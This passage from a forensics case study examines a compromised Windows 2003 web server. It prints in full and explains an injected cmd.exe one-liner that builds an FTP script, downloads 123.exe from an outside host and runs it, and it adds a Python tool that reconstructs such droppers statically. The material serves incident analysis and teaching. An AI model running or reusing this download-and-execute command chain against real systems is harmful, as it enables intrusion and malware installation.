In this case, the attacker was able to upload and execute the PDF file named in the command. One simple tool that we employed was the Sam Spade safe browser, which displays a Web page’s Hypertext Markup Language (HTML) source without actually rendering the page (www.samspade.org). Fetched that way, the "PDF" turned out not to be a PDF file at all but an HTML page that lets an attacker build exploit code.
Subsequent examination showed that this access came from a host on an ISP in New York City. The contnou.sapte.ro host, ostensibly in the Romanian (.ro) domain, resolved to an IP address within a block allocated to another New York City ISP.

Case Study #4: One Hole is All an Exploit Needs

One common software vulnerability is susceptibility to so-called buffer overflows, where a nefarious user supplies more data than the receiving buffer was sized to hold, overwriting adjacent memory and causing unexpected behavior. Properly written software will detect and reject accidental or deliberate overflow attempts, but many such vulnerabilities remain. Some buffer overflow exploits let a nefarious user run instructions of his own choosing on the server; a Bad Guy will use this vulnerability to install a rootkit, allowing the attacker to return later and own the system. A related class of vulnerabilities allows an attacker to force an application to execute a single command of the attacker’s choosing. As this case shows, one command is enough.

In late 2006, the authors investigated a hacked Web site at a small business running Windows 2003 Server. The systems administrator had noticed unusual log entries and then found that his system was running a number of unknown applications.

One item that the sysadmin found was this entry in the recent Run command list (Figure 3):

cmd.exe /c del i&echo open 192.0.2.68 5685 > i&echo user l l >> i&echo get 123.exe >> i &echo quit >> i &ftp -n -s:i & 123.exe&del i&exit

This command was found in the Registry key HKCU\

Simply stated, this single command created a file named i in the system32 directory (the command uses a bare relative name, so the file lands in the working directory of the exploited process) with the following contents:

open 192.0.2.68 5685
user l l
get 123.exe
quit

The file is a command script for FTP. First, a connection is made to port 5685 on host 192.0.2.68, presumably a hidden FTP daemon listening on a non-standard port. The script then logs in with the username l and the password l, downloads a file named 123.exe, and exits the FTP session. (192.0.2.68 is a placeholder address from the block reserved for documentation; the IP address that was actually employed resolved back to a Bell Canada DSL customer in the area of London, Ontario.)

This line was inserted by exploiting a vulnerability in one of the server’s applications that allowed an attacker to inject just one command. But this particular command is a compound command: it started the DOS command interpreter, built an FTP script, used FTP to run the script and download an attack tool, and then executed the attack tool. Each & separates one command from the next, and cmd.exe runs them in sequence regardless of whether the previous one succeeded (unlike &&, which runs the next command only on success), so the chain keeps going even when, for example, the initial del i finds nothing to delete. A detailed parsing of the injected command follows:

cmd.exe                        Run the DOS command interpreter
/c                             Interpret the string that follows this switch as the command line, then terminate
del i                          Delete any existing file named "i"
&                              Concatenate the next command (run unconditionally)
echo open 192.0.2.68 5685 > i  Write the line open 192.0.2.68 5685 to file i, creating or overwriting it
&                              Concatenate the next command
echo user l l >> i             Append the line user l l to file i
&                              Concatenate the next command
echo get 123.exe >> i          Append the line get 123.exe to file i
&                              Concatenate the next command
echo quit >> i                 Append the line quit to file i
&                              Concatenate the next command
ftp -n -s:i                    Run FTP with automatic login suppressed (-n), taking its commands from file i (-s:i)
&                              Concatenate the next command
123.exe                        Execute the downloaded file 123.exe
&                              Concatenate the next command
del i                          Delete file i
&                              Concatenate the next command
exit                           Exit this script

The nefarious command then executes 123.exe, deletes the file i, and exits the script. We found the file i, however, because once control was transferred to 123.exe this script never completed, so the del i that should have removed the evidence never ran. (Even if it had been deleted, it would have been discoverable with a computer forensics tool: del removes only the directory entry, and the file’s contents stay on disk until overwritten, since they were deleted and not wiped.)
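The parsing that the table above performs by hand can be automated for triage. The following is an added example, not code from the original article: it splits the injected command on cmd.exe’s & separator, simulates the echo redirections so the FTP script that was written to i can be reconstructed without running anything, and reports what the command fetched, executed and tried to delete. The command string is the one recorded in the article (with its placeholder address); the simulation is deliberately narrow (echo, del, ftp -s:, bare program launches) and does not model quoting or the || separator, both assumptions that hold for this sample.

```python
"""Static reconstruction of a cmd.exe "echo ... > file & ftp -s:file & run" dropper.

Added example; not code from the original article. It simulates only the
handful of commands that matter for triage so the FTP script and the attack
tool's name can be recovered without executing anything.
"""
import re
from dataclasses import dataclass, field

# The injected command exactly as recorded in the article (192.0.2.68 is the
# article's placeholder address).
INJECTED = ("cmd.exe /c del i&echo open 192.0.2.68 5685 > i&echo user l l >> i"
            "&echo get 123.exe >> i &echo quit >> i &ftp -n -s:i & 123.exe&del i&exit")

ECHO_RE = re.compile(r"^echo\s+(.*?)\s*(>>|>)\s*(\S+)$", re.IGNORECASE)
CMD_WRAPPER_RE = re.compile(r"^\s*cmd(?:\.exe)?\s+/c\s+", re.IGNORECASE)


@dataclass
class Trace:
    files: dict = field(default_factory=dict)      # simulated disk: name -> content
    ftp_sessions: list = field(default_factory=list)
    executed: list = field(default_factory=list)   # (program, was it fetched by this command?)
    deleted: list = field(default_factory=list)    # (name, content at the moment of deletion)


def split_cmd(cmdline: str) -> list:
    """Split on cmd.exe's separators. '&' runs the next command unconditionally and
    '&&' only on success; for reconstruction both are treated as separators.
    Quoting and '||' are not modelled (assumption: the sample needs neither)."""
    cmdline = CMD_WRAPPER_RE.sub("", cmdline, count=1)
    return [p.strip() for p in re.split(r"&&|&", cmdline) if p.strip()]


def parse_ftp_script(text: str) -> dict:
    """Pull host, port, user and fetched file names out of an ftp -s: script."""
    info = {"host": None, "port": 21, "user": None, "fetched": []}
    for line in text.splitlines():
        tok = line.split()
        if not tok:
            continue
        verb = tok[0].lower()
        if verb == "open" and len(tok) >= 2:
            info["host"] = tok[1]
            info["port"] = int(tok[2]) if len(tok) >= 3 and tok[2].isdigit() else 21
        elif verb == "user" and len(tok) >= 2:
            info["user"] = tok[1]          # tok[2], if present, is the password
        elif verb in ("get", "recv", "mget") and len(tok) >= 2:
            info["fetched"].extend(tok[1:])
    return info


def simulate(cmdline: str) -> Trace:
    """Walk the command the way the article's table does by hand."""
    t = Trace()
    for part in split_cmd(cmdline):
        m = ECHO_RE.match(part)
        if m:                                     # echo text > f  /  echo text >> f
            text, op, name = m.groups()
            prev = t.files.get(name, "") if op == ">>" else ""   # '>' truncates, '>>' appends
            t.files[name] = prev + text + "\n"    # cmd keeps the space before '>'; dropped here
            continue
        tok = part.split()
        verb = tok[0].lower()
        if verb == "del":
            for name in tok[1:]:
                if name in t.files:               # del only unlinks; keep the content as evidence
                    t.deleted.append((name, t.files.pop(name)))
        elif verb == "ftp":
            script = next((a[3:] for a in tok[1:] if a.lower().startswith("-s:")), None)
            if script in t.files:
                info = parse_ftp_script(t.files[script])
                t.ftp_sessions.append(info)
                for fetched in info["fetched"]:   # the download lands in the same directory
                    t.files[fetched] = "<fetched from %s:%s>" % (info["host"], info["port"])
        elif verb == "exit":
            break
        else:                                     # anything else is a program launch
            t.executed.append((tok[0], tok[0] in t.files))
    return t


def findings(t: Trace) -> list:
    """Human-readable triage lines derived from a trace."""
    out = []
    for s in t.ftp_sessions:
        port_note = "" if s["port"] == 21 else " (non-standard port)"
        out.append("fetches %s from %s:%d%s as user %s"
                   % (", ".join(s["fetched"]), s["host"], s["port"], port_note, s["user"]))
    for prog, fetched in t.executed:
        out.append(("runs freshly downloaded " if fetched else "runs ") + prog)
    for name, content in t.deleted:
        out.append("deletes its own %d-line script %s" % (len(content.splitlines()), name))
    return out


if __name__ == "__main__":
    trace = simulate(INJECTED)
    for name, content in trace.deleted:
        print("reconstructed %s:\n%s" % (name, content))
    print("\n".join(findings(trace)))
```

Because the simulation records a file's contents at the moment del removes it, the reconstructed script survives in the trace even though the real command tried to destroy it, which mirrors what the forensic examination recovered from disk. The static walk runs the whole chain to the end; on the compromised server the chain stalled at 123.exe, which is why the real file i was still present.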